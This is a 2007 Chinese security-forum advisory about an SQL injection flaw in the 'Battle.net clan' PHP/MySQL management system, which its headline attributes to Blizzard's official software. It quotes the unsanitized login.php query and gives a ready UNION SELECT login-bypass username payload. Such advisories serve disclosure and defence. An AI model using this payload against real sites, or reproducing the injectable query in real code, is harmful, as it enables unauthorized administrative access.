| | 网站首页 | 资料中心 | 安盟论坛 | | |
|
|
 |
您现在的位置: 安全联盟 >> 资料中心 >> Win黑客 >> 文章正文 |  用户登录  新用户注册 |
|
|||||
| 美国暴雪[魔兽世界] 官方程序漏洞 | |||||
作者:admin 文章来源:www.netdark.com 点击数: 更新时间:2007-6-11  |
|||||
|
Battle.net clan管理系统使用MySQL后端,允许用户方便的升级和维护web站点。 系统实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击,非授权获取系统的管理权限。 Battle.net clan的login.php脚本没有正确地验证通过index.php对user参数的输入: line 9 --> $user = $_POST['user']; ..... line 21--> mysql_query("Select * FROM bcs_members Where name='$user' AND password='$pass'", $link); 允许攻击者以管理员权限登录。但成功攻击要求禁用了magic_quotes_gpc。 Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/* |
|||||
| 文章录入:admin 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 友情链接 | ||||||||||||||
|
||||||||||||||
| | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | | |
 |
Copyright © 2006-2007 安全联盟, All Rights Reserved 站长:天 |
